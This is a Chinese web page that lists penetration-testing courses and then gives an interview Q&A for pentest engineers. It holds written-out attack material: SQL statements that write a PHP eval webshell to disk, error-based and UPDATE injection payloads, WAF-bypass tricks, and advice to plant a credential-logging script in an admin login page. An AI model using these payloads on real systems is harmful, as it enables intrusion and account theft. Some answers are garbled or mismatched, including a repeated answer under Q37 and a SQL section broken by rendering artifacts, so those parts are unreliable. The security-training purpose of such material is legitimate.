精华内容
参与话题
问答
  • 渗透测试工程师

    2018-12-14 19:16:26
    渗透测试工程师视频,安全入门必备,百度云网盘链接长期有效
  • 想要成为一名高级渗透测试工程师,要能独立完成诸多的安全测试项,此文档记载了较全面的安全测试项,共勉!
  • CISP-PTE也被称为“国家注册渗透测试工程师”,是国内第一个理论与实践相结合的技能水平注册考试,本课程为CISP-PTE第一阶段课程,知识点100%覆盖官方知识体系!让您无需缴纳高额的培训考试费,也可学习国内最权威的...
  • 网络安全与渗透测试工程师

    千人学习 2019-08-22 10:42:38
    随着社会基础产业全面互联网化,国家对网络安全的人才需求也呈现出井喷趋势。网络安全面临的威胁越来越大,然而...所以这套课程主要讲解面试安全工程师或渗透测试工程师必备的基本技能和学习方向,希望大家有所收获。
  • 网站渗透测试其实就是模拟黑客恶意攻击你的网站,找出一的网站漏洞,从而进行安全防御和维护的一种测试,一步一步成为渗透测试工程师渗透测试工程师-网络攻防入门书籍推荐 《Python黑帽子:黑客与渗透测试编程之道...

    网站渗透测试其实就是模拟黑客恶意攻击你的网站,找出一的网站漏洞,从而进行安全防御和维护的一种测试,一步一步成为渗透测试工程师!

    渗透测试工程师-网络攻防入门书籍推荐
    《Python黑帽子:黑客与渗透测试编程之道》
    作者在本书中的很多实例都非常具有创新和启发意义, 如 HTTP 数据中的图片检测、 基于 GitHub命令进行控制的模块化木马、浏览器的中间人攻击技术、利用 COM 组件自动化技术窃取数据、通过进程监视和代码插入实现权限提升、通过向虚拟机内存快照中插入 shellcode 实现木马驻留和权限提升等。通过对这些技术的学习,读者不仅能掌握各种 Python 库的应用和编程技术,还能拓宽视野,培养和锻炼自己的黑客思维。读者在阅读本书时也完全感觉不到其他一些技术书籍常见的枯燥和乏味。

    渗透技术网络攻防需要什么语言?
    渗透网站是在找网站的在编写时的露洞.这个需要会超文本语言和相应的程序如asp,php.还要有网站安全相关知识的。

    网络攻防技术渗透零基础教程
    第一章:入门

    1. 渗透测试和渗透测试工程师的概念
    2. OWASP渗透测试指南的介绍及名词解释
    3. 渗透测试流程

    第二章:基础
    4. 组建渗透测试环境
    5. 组建渗透测试环境2
    6. Nmap、nessus等网络扫描工具的介绍和使用
    7. 对网络设备、操作系统的检测和攻击测试
    8. WEB、DB、DNS等服务器的概念和和介绍,搭建简单的WEB+DB环境
    9. 不同WEB/DB组合类型的一般性渗透测试思路

    第三章:进阶
    10. 各种WVS扫描器的使用
    11. Burpsuite、ZAP等本地代理工具的介绍和使用
    12. 注入点的利用方法以及各种自动化注入工具的使用,中转注入的流程
    13. 注入点利用系列之二
    14. 注入点利用系列之三
    15. 中转注入的几种方法
    16. 解析漏洞的介绍,各种绕过上传的方法
    17. RFI/LFI漏洞,代码执行漏洞的简介
    18. webshell的介绍和利用

    第四章:高级
    19. 实战中对目标的预测试:信息收集

    渗透测试工程师养成之路-渗透教程百度盘下载地址:
    http://www.xuexiluxian.net/shentou-ceshi.html

    展开全文
  • 渗透测试工程师面试题大全
  • 网络安全与渗透测试工程师 云知梦创始人,国际架构师,11年互联网培训和开发经...

    订阅后:请点击此处观看视频课程

     

    视频教程-网络安全与渗透测试工程师-渗透测试

    学习有效期:永久观看

    学习时长:293分钟

    学习计划:5天

    难度:

     

    口碑讲师带队学习,让你的问题不过夜」

    讲师姓名:李强强

    CEO/董事长/总经理

    讲师介绍:云知梦创始人,国际架构师,11年互联网培训和开发经验,曾在港电讯盈科、北大青鸟集团、远大教育、北京易第优教育等公司任职曾获得美国红帽RHCA构架师和RHCDS数据中心讲师,在国内排名第40名,在全球排名第300名。

    ☛点击立即跟老师学习☚

     

    「你将学到什么?」

    随着社会基础产业全面互联网化,国家对网络安全的人才需求也呈现出井喷趋势。网络安全面临的威胁越来越大,然而我国只有126所高校设立了143个网络安全相关专业,仅占1200所理工院校的10%。所以这套课程主要讲解面试安全工程师或渗透测试工程师必备的基本技能和学习方向,希望大家有所收获。

     

    「课程学习目录」

    第1章:安全入门须知
    1.安全就业解读
    2.安全概述与行业趋势
    第2章:信息收集
    1.信息收集技术与端口扫描技术
    2.NMAP(诸神之眼)的运用
    第3章:漏洞利用
    1.安全漏洞概述与检测技术
    2.Nessus介绍与漏洞扫描
    3.Metasploit介绍与漏洞利用
    第4章:安全加固
    1.安全加固概述与Windows安全漏洞修复
    2.Windows安全配置加固
    第5章:WEB安全知识点(上)
    1.WEB安全概述与HTML基础
    2.HTTP基础与JS基础
    第6章:WEB安全知识点(下)
    1.SQL基础与PHP基础
    2.DVWA环境搭建与Burp的运用
    第7章:SQL注入
    1.SQL注入漏洞的原理与防范
    2.SQLMAP的运用
    第8章:XSS注入
    1.XSS注入漏洞的原理与防范
    2.XSSER的运用
    第9章:漏洞实战
    1.一句话木马原理与利用
    2.文件上传漏洞原理与利用
    第10章:面试之常见漏洞
    1.OWASP TOP 10与常见漏洞
    第11章:渗透测试的基本思路
    1.WEB漏洞扫描器AWVS的运用
    2.WEB站点的渗透测试流程
    第12章:不可不知的安全产品
    1.安全产品概述

     

    7项超值权益,保障学习质量」

    • 大咖讲解

    技术专家系统讲解传授编程思路与实战。

    • 答疑服务

    专属社群随时沟通与讲师答疑,扫清学习障碍,自学编程不再难。

    • 课程资料+课件

    超实用资料,覆盖核心知识,关键编程技能,方便练习巩固。(部分讲师考虑到版权问题,暂未上传附件,敬请谅解)

    • 常用开发实战

    企业常见开发实战案例,带你掌握Python在工作中的不同运用场景。

    • 大牛技术大会视频

    2019Python开发者大会视频免费观看,送你一个近距离感受互联网大佬的机会。

    • APP+PC随时随地学习

    满足不同场景,开发编程语言系统学习需求,不受空间、地域限制。

     

    「什么样的技术人适合学习?」

    • 想进入互联网技术行业,但是面对多门编程语言不知如何选择,0基础的你
    • 掌握开发、编程技术单一、冷门,迫切希望能够转型的你
    • 想进入大厂,但是编程经验不够丰富,没有竞争力,程序员找工作难。

     

    「悉心打造精品好课,5天学到大牛3年项目经验」

    【完善的技术体系】

    技术成长循序渐进,帮助用户轻松掌握

    掌握渗透测试知识,扎实编码能力

    【清晰的课程脉络】

    浓缩大牛多年经验,全方位构建出系统化的技术知识脉络,同时注重实战操作。

    【仿佛在大厂实习般的课程设计】

    课程内容全面提升技术能力,系统学习大厂技术方法论,可复用在日后工作中。

     

    「你可以收获什么?」

    掌握网络安全与渗透测试

    掌握信息安全相关知识

     

    展开全文
  • CISP-PTE注册信息安全专业人员-渗透测试工程师知识体系大纲:操作系统安全基础、中间件安全基础、数据库安全基础、web安全基础。
  • 通过对本课程的学习,学者可以胜任各大公司安全渗透测试工程师的位置;开发一些实用的安全小工具并开源,体现个人实力;建立自己的安全体系,对公司安全有自己的一些认识和见解。 学习地址 百度:...

    1.png

    教程介绍

    通过对本课程的学习,学者可以胜任各大公司安全渗透测试工程师的位置;开发一些实用的安全小工具并开源,体现个人实力;建立自己的安全体系,对公司安全有自己的一些认识和见解。

    学习地址

    百度:https://pan.baidu.com/s/12VGv2yWsY_OO2tYAd7uy2w

    展开全文
  • 渗透测试面试题 一.思路流程 1.信息收集 服务器的相关信息(真实ip,系统类型,版本,开放端口,WAF等) 网站指纹识别(包括,cms,cdn,证书等),dns记录 whois信息,姓名,备案,邮箱,电话反查(邮箱丢社工库...

    渗透测试面试题


    一.思路流程
    1.信息收集
    服务器的相关信息(真实ip,系统类型,版本,开放端口,WAF等)
    网站指纹识别(包括,cms,cdn,证书等),dns记录
    whois信息,姓名,备案,邮箱,电话反查(邮箱丢社工库,社工准备等)
    子域名收集,旁站,C段等
    google hacking针对化搜索,pdf文件,中间件版本,弱口令扫描等
    扫描网站目录结构,爆后台,网站banner,测试文件,备份等敏感文件泄漏等
    传输协议,通用漏洞,exp,github源码等

    2.漏洞挖掘
    浏览网站,看看网站规模,功能,特点等
    端口,弱口令,目录等扫描,对响应的端口进行漏洞探测,比如 rsync,心脏出血,mysql,ftp,ssh弱口令等。
    XSS,SQL注入,上传,命令注入,CSRF,cookie安全检测,敏感信息,通信数据传输,暴力破解,任意文件上传,越权访问,未授权访问,目录遍历,文件 包含,重放攻击(短信轰炸),服务器漏洞检测,最后使用漏扫工具等

    3.漏洞利用&权限提升
    mysql提权,serv-u提权,oracle提权
    windows 溢出提权
    linux脏牛,内核漏洞提权

    4.清除测试数据&输出报告
    日志、测试数据的清理
    总结,输出渗透测试报告,附修复方案

    5.复测
    验证并发现是否有新漏洞,输出报告,归档

    二. 面试问题
    1.拿到一个待检测的站,你觉得应该先做什么?
    (给你一个网站你是如何来渗透测试的?在获取书面授权的前提下)

    第一步—信息收集
    1、获取域名的whois信息,获取注册者邮箱姓名电话等,丢社工库里看看有没有泄露密码,然后尝试用泄露的密码进行登录后台。用邮箱做关键词进行丢进搜索引擎。利用搜索到的关联信息找出其他邮箱进而得到常用社交账号。社工找出社交账号,里面或许会找出管理员设置密码的习惯 。利用已有信息生成专用字典。
    2、查询服务器旁站以及子域名站点,因为主站一般比较难,所以先看看旁站有没有通用性的cms或者其他漏洞。
    3、查看服务器操作系统版本,web中间件,看看是否存在已知的漏洞,比如IIS,APACHE,NGINX的解析漏洞
    4、查看IP,进行IP地址端口扫描,对响应的端口进行漏洞探测,比如 rsync,心脏出血,mysql,ftp,ssh弱口令等。
    5、扫描网站目录结构,看看是否可以遍历目录,或者敏感文件泄漏,比如php探针
    6、google hack 进一步探测-网站的信息,后台,-敏感文件

    第二步—漏洞扫描
    开始检测-漏洞,如XSS,XSRF,sql注入,代码执行,命令执行,越权访问,目录读取,任意文件读取,下载,文件包含,远程命令执行,弱口令,上传,编辑器漏洞,暴力破解等

    第三步—漏洞利用
    利-用以上的方式拿到webshell,或者其他权限

    第四步— 权限提升
    提权服务器,比如windows下mysql的udf提权,serv-u提权,windows低版本的漏洞,如iis6,pr,巴西烤肉,linux脏牛漏洞,linux内核版本漏洞提权,linux下的mysql system提权以及oracle低权限提权

    第五步—日志-清理
    第六步— 总结报告及修复方案
    2.判断出网站的CMS对渗透有什么意义?
    查找网上已曝光的程序漏洞。
    如果开源,还能下载相对应的源码进行代码审计。

    3.一个成熟并且相对安全的CMS,渗透时扫目录的意义?
    敏感文件、二级目录扫描
    站长的误操作比如:网站备份的压缩文件、说明.txt、二级目录可能存放着其他站点

    4.常见的网站服务器容器。
    IIS、Apache、nginx、Lighttpd、Tomcat

    5.mysql注入点,用工具对目标站直接写入一句话,需要哪些条件?
    root权限 网站的绝对路径。

    6.目前已知哪些版本的容器有解析漏洞,具体举例。
    a、IIS 6.0
    /xx.asp/xx.jpg "xx.asp"是文件夹名
    b、IIS 7.0/7.5
    默认Fast-CGI开启,直接在url中图片地址后面输入/1.php,会把正常图片当成php解析
    c、Nginx
    版本小于等于0.8.37,利用方法和IIS 7.0/7.5一样,Fast-CGI关闭情况下也可利用。空字节代码 xxx.jpg.php
    d、Apache 上传的文件命名为:test.php.x1.x2.x3,Apache是从右往左判断后缀
    e、lighttpd xx.jpg/xx.php,不全,请小伙伴们在评论处不吝补充,谢谢!

    7.如何手工快速判断目标站是windows还是linux服务器?
    linux大小写敏感,
    windows大小写不敏感。

    8.为何一个mysql数据库的站,只有一个80端口开放?
    更改了端口,没有扫描出来。
    站库分离。
    3306端口不对外开放

    9、3389无法连接的几种情况
    没开放3389 端口
    端口被修改
    防护拦截
    处于内网(需进行端口转发)

    10.如何突破注入时字符被转义?
    宽字符注入
    hex编码绕过

    11.在某后台新闻编辑界面看到编辑器,应该先做什么?
    查看编辑器的名称版本,然后搜索公开的漏洞。

    12.拿到一个webshell发现网站根目录下有.htaccess文件,我们能做什么?
    能做的事情很多,用隐藏网马来举例子:
    插入
    <FilesMatch “xxx.jpg”> SetHandler application/x-httpd-php
    .jpg文件会被解析成.php文件。
    具体其他的事情,不好详说,建议大家自己去搜索语句来玩玩。

    13.注入漏洞只能查账号密码?
    只要权限广,拖库脱到老。

    14.安全狗会追踪变量,从而发现出是一句话木马吗?
    是根据特征码,所以很好绕过了,只要思路宽,绕狗绕到欢,但这应该不会是一成不变的。

    15.access 扫出后缀为asp的数据库文件,访问乱码,如何实现到本地利用?
    迅雷下载,直接改后缀为.mdb。

    16.提权时选择可读写目录,为何尽量不用带空格的目录?
    因为exp执行多半需要空格界定参数

    17.某服务器有站点A,B 为何在A的后台添加test用户,访问B的后台。发现也添加上了test用户?
    同数据库。

    18.注入时可以不使用and 或or 或xor,直接order by 开始注入吗?
    and/or/xor,前面的1=1、1=2步骤只是为了判断是否为注入点,如果已经确定是注入点那就可以省那步骤去。

    19:某个防注入系统,在注入时会提示:
    系统检测到你有非法注入的行为。
    已记录您的ip xx.xx.xx.xx
    时间:2016:01-23
    提交页面:test.asp?id=15
    提交内容:and 1=1

    如何利用这个防注入系统拿shell?
    在URL里面直接提交一句话,这样网站就把你的一句话也记录进数据库文件了 这个时候可以尝试寻找网站的配置文件 直接上菜刀链接。

    21.上传大马后访问乱码时,有哪些解决办法?
    浏览器中改编码。

    22.审查上传点的元素有什么意义?
    有些站点的上传文件类型的限制是在前端实现的,这时只要增加上传类型就能突破限制了。

    23.目标站禁止注册用户,找回密码处随便输入用户名提示:“此用户不存在”,你觉得这里怎样利用?
    先爆破用户名,再利用被爆破出来的用户名爆破密码。
    其实有些站点,在登陆处也会这样提示
    所有和数据库有交互的地方都有可能有注入。

    24.目标站发现某txt的下载地址为http://www.test.com/down/down.php?file=/upwdown/1.txt,你有什么思路
    这就是传说中的下载漏洞!在file=后面尝试输入index.php下载他的首页文件,然后在首页文件里继续查找其他网站的配置文件,可以找出网站的数据库密码和数据库的地址。

    25.甲给你一个目标站,并且告诉你根目录下存在/abc/目录,并且此目录下存在编辑器和admin目录。请问你的想法是?
    直接在网站二级目录/abc/下扫描敏感文件及目录。

    26.在有shell的情况下,如何使用xss实现对目标站的长久控制?
    后台登录处加一段记录登录账号密码的js,并且判断是否登录成功,如果登录成功,就把账号密码记录到一个生僻的路径的文件中或者直接发到自己的网站文件中。(此方法适合有价值并且需要深入控制权限的网络)。
    在登录后才可以访问的文件中插入XSS脚本。

    27.后台修改管理员密码处,原密码显示为*。你觉得该怎样实现读出这个用户的密码?
    审查元素 把密码处的password属性改成text就明文显示了

    28.目标站无防护,上传图片可以正常访问,上传脚本格式访问则403.什么原因?
    原因很多,有可能web服务器配置把上传目录写死了不执行相应脚本,尝试改后缀名绕过

    29.审查元素得知网站所使用的防护软件,你觉得怎样做到的?
    在敏感操作被拦截,通过界面信息无法具体判断是什么防护的时候,F12看HTML体部 比如护卫神就可以在名称那看到内容。

    30.在win2003服务器中建立一个 .zhongzi文件夹用意何为?
    隐藏文件夹,为了不让管理员发现你传上去的工具。

    31、sql注入有以下两个测试选项,选一个并且阐述不选另一个的理由:
    A. demo.jsp?id=2+1
    B. demo.jsp?id=2-1
    选B,在 URL 编码中 + 代表空格,可能会造成混淆

    32、以下链接存在 sql 注入漏洞,对于这个变形注入,你有什么思路?
    demo.do?DATA=AjAxNg==
    DATA有可能经过了 base64 编码再传入服务器,所以我们也要对参数进行 base64 编码才能正确完成测试

    33、发现 demo.jsp?uid=110 注入点,你有哪几种思路获取 webshell,哪种是优选?
    有写入权限的,构造联合查询语句使用using INTO OUTFILE,可以将查询的输出重定向到系统的文件中,这样去写入 WebShell 使用 sqlmap –os-shell 原理和上面一种相同,来直接获得一个 Shell,这样效率更高 通过构造联合查询语句得到网站管理员的账户和密码,然后扫后台登录后台,再在后台通过改包上传等方法上传 Shell

    34、CSRF 和 XSS 和 XXE 有什么区别,以及修复方式?
    XSS是跨站脚本攻击,用户提交的数据中可以构造代码来执行,从而实现窃取用户信息等攻击。
    修复方式:对字符实体进行转义、使用HTTP Only来禁止JavaScript读取Cookie值、输入时校验、浏览器与Web应用端采用相同的字符编码。
    CSRF是跨站请求伪造攻击,XSS是实现CSRF的诸多手段中的一种,是由于没有在关键操作执行时进行是否由用户自愿发起的确认。
    修复方式:筛选出需要防范CSRF的页面然后嵌入Token、再次输入密码、检验Referer
    XXE是XML外部实体注入攻击,XML中可以通过调用实体来请求本地或者远程内容,和远程文件保护类似,会引发相关安全问题,例如敏感文件读取。
    修复方式:XML解析库在调用时严格禁止对外部实体的解析。

    35、CSRF、SSRF和重放攻击有什么区别?
    CSRF是跨站请求伪造攻击,由客户端发起 SSRF是服务器端请求伪造,由服务器发起 重放攻击是将截获的数据包进行重放,达到身份认证等目的

    36、说出至少三种业务逻辑漏洞,以及修复方式?
    密码找回漏洞中存在
    1)密码允许暴力破解、
    2)存在通用型找回凭证、
    3)可以跳过验证步骤、
    4)找回凭证可以拦包获取
    等方式来通过厂商提供的密码找回功能来得到密码。
    身份认证漏洞中最常见的是
    1)会话固定攻击
    2) Cookie 仿冒
    只要得到 Session 或 Cookie 即可伪造用户身份。
    验证码漏洞中存在
    1)验证码允许暴力破解
    2)验证码可以通过 Javascript 或者改包的方法来进行绕过

    37、圈出下面会话中可能存在问题的项,并标注可能会存在的问题?
    get /ecskins/demo.jsp?uid=2016031900&keyword=”hello world”HTTP/1.1Host:.com:82User-Agent:Mozilla/5.0 Firefox/40Accept:text/css,/;q=0.1Accept-Language:zh-CN;zh;q=0.8;en-US;q=0.5,en;q=0.3Referer:http://****.com/eciop/orderForCC/cgtListForCC.htm?zone=11370601&v=145902Cookie:myguid1234567890=1349db5fe50c372c3d995709f54c273d;uniqueserid=session_OGRMIFIYJHAH5_HZRQOZAMHJ;st_uid=N90PLYHLZGJXI-NX01VPUF46W;status=TrueConnection:keep-alive
    有写入权限的,构造联合查询语句使用using INTO OUTFILE,可以将查询的输出重定向到系统的文件中,这样去写入 WebShell 使用 sqlmap –os-shell 原理和上面一种相同,来直接获得一个 Shell,这样效率更高 通过构造联合查询语句得到网站管理员的账户和密码,然后扫后台登录后台,再在后台通过改包上传等方法上传 Shell

    39、sqlmap,怎么对一个注入点注入?
    1)如果是get型号,直接,sqlmap -u “诸如点网址”.
    2) 如果是post型诸如点,可以sqlmap -u "注入点网址” --data=“post的参数”
    3)如果是cookie,X-Forwarded-For等,可以访问的时候,用burpsuite抓包,注入处用号替换,放到文件里,然后sqlmap -r “文件地址”

    40、nmap,扫描的几种方式
    主机发现
    版本检测
    操作系统检测
    网络追踪
    Nmap脚本引擎

    41、sql注入的几种类型?
    1)报错注入
    2)bool型注入
    3)延时注入
    4)宽字节注入

    42、报错注入的函数有哪些?10个
    1)and extractvalue(1, concat(0x7e,(select @@version),0x7e))】】】
    2)通过floor报错 向下取整
    3)+and updatexml(1, concat(0x7e,(secect @@version),0x7e),1)
    4).geometrycollection()select from test where id=1 and geometrycollection((select from(selectfrom(select user())a)b));
    5).multipoint()select from test where id=1 and multipoint((select from(select from(select user())a)b));
    6).polygon()select from test where id=1 and polygon((select from(select from(select user())a)b));
    7).multipolygon()select from test where id=1 and multipolygon((select from(select from(select user())a)b));
    8).linestring()select from test where id=1 and linestring((select from(select from(select user())a)b));
    9).multilinestring()select from test where id=1 and multilinestring((select from(select from(select user())a)b));
    10).exp()select from test where id=1 and exp(~(select * from(select user())a));

    43、延时注入如何来判断?
    if(ascii(substr(“hello”, 1, 1))=104, sleep(5), 1)

    44、盲注和延时注入的共同点?
    都是一个字符一个字符的判断

    45、如何拿一个网站的webshell?
    上传,后台编辑模板,sql注入写文件,命令执行,代码执行, 一些已经爆出的cms漏洞,比如dedecms后台可以直接建立脚本文件,wordpress上传插件包含脚本文件zip压缩包等

    46、sql注入写文件都有哪些函数?
    select ‘一句话’ into outfile '路径’select ‘一句话’ into dumpfile '路径’select ‘<?php eval($_POST[1]) ?>’ into dumpfile ‘d:\wwwroot\baidu.com\nvhack.php’;

    47、如何防止CSRF?
    1,验证referer
    2,验证token
    详细:http://cnodejs.org/topic/5533dd6e9138f09b629674fd

    48、owasp 漏洞都有哪些?
    1、SQL注入防护方法:
    2、失效的身份认证和会话管理
    3、跨站脚本攻击XSS
    4、直接引用不安全的对象
    5、安全配置错误
    6、敏感信息泄露
    7、缺少功能级的访问控制
    8、跨站请求伪造CSRF
    9、使用含有已知漏洞的组件
    10、未验证的重定向和转发

    49、SQL注入防护方法?
    1、使用安全的API
    2、对输入的特殊字符进行Escape转义处理
    3、使用白名单来规范化输入验证方法
    4、对客户端输入进行控制,不允许输入SQL注入相关的特殊字符
    5、服务器端在提交数据库进行SQL查询之前,对特殊字符进行过滤、转义、替换、删除。

    50、代码执行,文件读取,命令执行的函数都有哪些?
    1)代码执行:
    eval,preg_replace+/e,assert,call_user_func,call_user_func_array,create_function
    2)文件读取:
    file_get_contents(),highlight_file(),fopen(),read
    file(),fread(),fgetss(), fgets(),parse_ini_file(),show_source(),file()等3)命令执行:
    system(), exec(), shell_exec(), passthru() ,pcntl_exec(), popen(),proc_open()

    51、img标签除了onerror属性外,还有其他获取管理员路径的办法吗?
    src指定一个远程的脚本文件,获取referer

    52、img标签除了onerror属性外,并且src属性的后缀名,必须以.jpg结尾,怎么获取管理员路径。
    远程服务器修改apache配置文件,配置.jpg文件以php方式来解析 AddType application/x-httpd-php .jpg  会以php方式来解析

    53、为什么aspx木马权限比asp大?
    aspx使用的是.net技术。IIS 中默认不支持,ASP只是脚本语言而已。入侵的时候asp的木马一般是guest权限…APSX的木马一般是users权限。

    54、如何绕过waf?
    大小写转换法
    干扰字符 /!/
    编码 base64 unicode hex url ascll 复参数

    55、如何向服务器写入webshell?
    各种上传漏洞mysql具有写入权限,用sql语句写入shellhttp put方法

    56、渗透测试中常见的端口
    web类(web漏洞/敏感目录) 第三方通用组件漏洞struts thinkphp jboss ganglia zabbix
    80 web
    80-89 web
    8000-9090 web
    数据库类(扫描弱口令)
    1433 MSSQL
    1521 Oracle
    3306 MySQL
    5432 PostgreSQL
    特殊服务类(未授权/命令执行类/漏洞)
    443 SSL心脏滴血
    873 Rsync未授权
    5984 CouchDB http://xxx:5984/_utils/
    6379 redis未授权
    7001,7002 WebLogic默认弱口令,反序列
    9200,9300 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch命令执行漏洞
    11211 memcache未授权访问
    27017,27018 Mongodb未授权访问
    50000 SAP命令执行
    50070,50030 hadoop默认端口未授权访问
    常用端口类(扫描弱口令/端口爆破)
    21 ftp
    22 SSH
    23 Telnet
    2601,2604
    zebra路由,默认密码zebra
    3389 远程桌面
    端口合计详情
    21 ftp 22 SSH 23 Telnet 80 web 80-89 web 161 SNMP 389 LDAP 443 SSL心脏滴血以及一些web漏洞测试 445 SMB 512,513,514 Rexec 873 Rsync未授权 1025,111 NFS 1433 MSSQL 1521 Oracle:(iSqlPlus Port:5560,7778) 2082/2083 cpanel主机管理系统登陆 (国外用较多)2222 DA虚拟主机管理系统登陆 (国外用较多) 2601,2604 zebra路由,默认密码zebra3128 squid代理默认端口,如果没设置口令很可能就直接漫游内网了 3306 MySQL 3312/3311 kangle主机管理系统登陆 3389 远程桌面 4440 rundeck 参考WooYun: 借用新浪某服务成功漫游新浪内网 5432 PostgreSQL 5900 vnc 5984 CouchDB http://xxx:5984/_utils/ 6082 varnish 参考WooYun: Varnish HTTP accelerator CLI 未授权访问易导致网站被直接篡改或者作为代理进入内网 6379 redis未授权 7001,7002 WebLogic默认弱口令,反序列 7778 Kloxo主机控制面板登录 8000-9090 都是一些常见的web端口,有些运维喜欢把管理后台开在这些非80的端口上 8080 tomcat/WDCP主机管理系统,默认弱口令 8080,8089,9090 JBOSS 8083 Vestacp主机管理系统 (国外用较多) 8649 ganglia 8888 amh/LuManager 主机管理系统默认端口 9200,9300 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch命令执行漏洞 10000 Virtualmin/Webmin 服务器虚拟主机管理系统 11211 memcache未授权访问 27017,27018 Mongodb未授权访问 28017 mongodb统计页面 50000 SAP命令执行 50070,50030 hadoop默认端口未授权访问

    四.SQL注入
    SQL注入防护
    1、使用安全的API
    2、对输入的特殊字符进行Escape转义处理
    3、使用白名单来规范化输入验证方法
    4、对客户端输入进行控制,不允许输入SQL注入相关的特殊字符
    5、服务器端在提交数据库进行SQL查询之前,对特殊字符进行过滤、转义、替换、删除。
    6、规范编码,字符集

    为什么参数化查询可以防止sql注入
    原理:
    使用参数化查询数据库服务器不会把参数的内容当作sql指令的一部分来执行,是在数据库完成sql指令的编译后才套用参数运行
    简单的说: 参数化能防注入的原因在于,语句是语句,参数是参数,参数的值并不是语句的一部分,数据库只按语句的语义跑
    SQL头注入点
    UAREFERERCOOKIEIP

    盲注是什么?怎么盲注?
    盲注是在SQL注入攻击过程中,服务器关闭了错误回显,我们单纯通过服务器返回内容的变化来判断是否存在SQL注入和利用的方式。
    盲注的手段有两种,一个是通过页面的返回内容是否正确(boolean-based),来验证是否存在注入。一个是通过sql语句处理时间的不同来判断是否存在注入(time-based),在这里,可以用benchmark,sleep等造成延时效果的函数,也可以通过构造大笛卡儿积的联合查询表来达到延时的目的。

    宽字节注入产生原理以及根本原因
    产生原理
    在数据库使用了宽字符集而WEB中没考虑这个问题的情况下,在WEB层,由于0XBF27是两个字符,在PHP中比如addslash和magic_quotes_gpc开启时,由于会对0x27单引号进行转义,因此0xbf27会变成0xbf5c27,而数据进入数据库中时,由于0XBF5C是一个另外的字符,因此\转义符号会被前面的bf带着"吃掉",单引号由此逃逸出来可以用来闭合语句。
    在哪里编码
    根本原因
    character_set_client(客户端的字符集)和character_set_connection(连接层的字符集)不同,或转换函数如,iconv、mb_convert_encoding使用不当。
    解决办法
    统一数据库、Web应用、操作系统所使用的字符集,避免解析产生差异,最好都设置为UTF-8。或对数据进行正确的转义,如mysql_real_escape_string+mysql_set_charset的使用。

    sql里面只有update怎么利用
    先理解这句 SQL
    UPDATE user SET password=‘MD5(password)′,homepage=′ password)', homepage='password) 

     ,homepage= 

     homepage’ WHERE id=‘id′如果此SQL被修改成以下形式,就实现了注入a、修改homepage值为http://xxx.net′,userlevel=′3之后SQL语句变为UPDATEuserSETpassword=′mypass′,homepage=′http://xxx.net′,userlevel=′3′WHEREid=′ id'如果此 SQL 被修改成以下形式,就实现了注入a、修改 homepage 值为http://xxx.net', userlevel='3之后 SQL 语句变为UPDATE user SET password='mypass', homepage='http://xxx.net', userlevel='3' WHERE id='id 

     如果此SQL被修改成以下形式,就实现了注入a、修改homepage值为http://xxx.net 

     ,userlevel= 

     3之后SQL语句变为UPDATEuserSETpassword= 

     mypass 

     ,homepage= 

     http://xxx.net 

     ,userlevel= 

     3 

     WHEREid= 

     id’
    userlevel 为用户级别
    b、修改 password 值为mypass)’ WHERE username=‘admin’#
    之后 SQL 语句变为
    UPDATE user SET password=‘MD5(mypass)’ WHERE username=‘admin’#)’, homepage=‘homepage′WHEREid=′ homepage' WHERE id='homepage 

     WHEREid= 

     id’
    c、修改 id 值为’ OR username=‘admin’之后 SQL 语句变为
    UPDATE user SET password=‘MD5(password)′,homepage=′ password)', homepage='password) 

     ,homepage= 

     homepage’ WHERE id=’’ OR username=‘admin’

    sql如何写shell/单引号被过滤怎么办
    写shell: root权限,GPC关闭,知道文件路径 outfile函数
    http://127.0.0.1:81/sqli.php?id=1 into outfile 'C:\\wamp64\\www\\phpinfo.php' FIELDS TERMINATED BY '<?php phpinfo(); ?>'
    http://127.0.0.1:81/sqli.php?id=-1 union select 1,0x3c3f70687020706870696e666f28293b203f3e,3,4 into outfile 'C:\\wamp64\\www\\phpinfo.php'

    宽字节注入
    代替空格的方法
    %0a、%0b、%a0 等/**/ 等注释符<>
    mysql的网站注入,5.0以上和5.0以下有什么区别?
    5.0以下没有information_schema这个系统表,无法列表名等,只能暴力跑表名。
    5.0以下是多用户单操作,5.0以上是多用户多操做。

    五.XSS
    XSS原理
    反射型
    用户提交的数据中可以构造代码来执行,从而实现窃取用户信息等攻击。需要诱使用户“点击”一个恶意链接,才能攻击成功
    储存型
    存储型XSS会把用户输入的数据“存储”在服务器端。这种XSS具有很强的稳定性。
    DOM型
    通过修改页面的DOM节点形成的XSS,称之为DOM Based XSS。

    DOM型和反射型的区别
    **反射型XSS:**通过诱导用户点击,我们构造好的恶意payload才会触发的XSS。反射型XSS的检测我们在每次请求带payload的链接时页面应该是会带有特定的畸形数据的。
    DOM型:通过修改页面的DOM节点形成的XSS。DOM-based XSS由于是通过js代码进行dom操作产生的XSS,所以在请求的响应中我们甚至不一定会得到相应的畸形数据。根本区别在我看来是输出点的不同。

    DOM型XSS 自动化测试或人工测试
    人工测试思路:找到类似document.write、innerHTML赋值、outterHTML赋值、window.location操作、写javascript:后内容、eval、setTimeout 、setInterval 等直接执行之类的函数点。找到其变量,回溯变量来源观察是否可控,是否经过安全函数。
    自动化测试思路是从输入入手,观察变量传递的过程,最终检查是否有在危险函数输出,中途是否有经过安全函数。但是这样就需要有一个javascript解析器,否则会漏掉一些通过js执行带入的部分内容。
    在回答这段问题的时候,由于平时对客户的检测中,基本是凭借不同功能点的功能加上经验和直觉来进行检测,对不同类型的XSS检测方式实际上并没有太过细分的标准化检测方式,所以回答的很烂。。。

    对于XSS怎么修补建议
    输入点检查:对用户输入的数据进行合法性检查,使用filter过滤敏感字符或对进行编码转义,针对特定类型数据进行格式检查。针对输入点的检查最好放在服务器端实现。
    输出点检查:对变量输出到HTML页面中时,对输出内容进行编码转义,输出在HTML中时,对其进行HTMLEncode,如果输出在Javascript脚本中时,对其进行JavascriptEncode。
    对使用JavascriptEncode的变量都放在引号中并转义危险字符,data部分就无法逃逸出引号外成为code的一部分。还可以使用更加严格的方法,对所有数字字母之外的字符都使用十六进制编码。
    此外,要注意在浏览器中,HTML的解析会优先于Javascript的解析,编码的方式也需要考虑清楚,针对不同的输出点,我们防御XSS的方法可能会不同,
    除此之外,还有做HTTPOnly对Cookie劫持做限制。

    XSS蠕虫的产生条件
    正常情况下,一个是产生XSS点的页面不属于self页面,用户之间产生交互行为的页面,都可能造成XSS Worm的产生。
    不一定需要存储型XSS

    六.CSRF
    CSRF原理
